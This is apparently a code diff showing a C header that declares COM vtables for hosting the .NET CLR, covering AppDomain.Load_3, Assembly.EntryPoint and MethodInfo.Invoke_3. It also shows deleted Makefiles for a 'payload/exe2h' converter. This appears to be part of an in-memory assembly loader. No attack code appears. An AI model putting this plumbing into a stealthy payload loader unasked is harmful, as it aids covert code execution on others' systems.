105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
+0
-4
payload/exe2h/Makefile less more
0 exe2h:
1 gcc -I ../../include -Wall exe2h.c -oexe2h
2 clean:
3 rm *.o exe2h
+0
-4
payload/exe2h/Makefile.mingw less more
0 exe2h:
1 x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe
2 clean:
3 rm exe2h.exe *.o
+0
-4
payload/exe2h/Makefile.msvc less more
0 exe2h:
1 cl exe2h.c mmap-windows.c
2 clean:
3 del exe2h.obj mmap-windows.obj exe2h.exe
+0
-319
payload/exe2h/exe2h.c less more
0 /**
1 BSD 3-Clause License
2
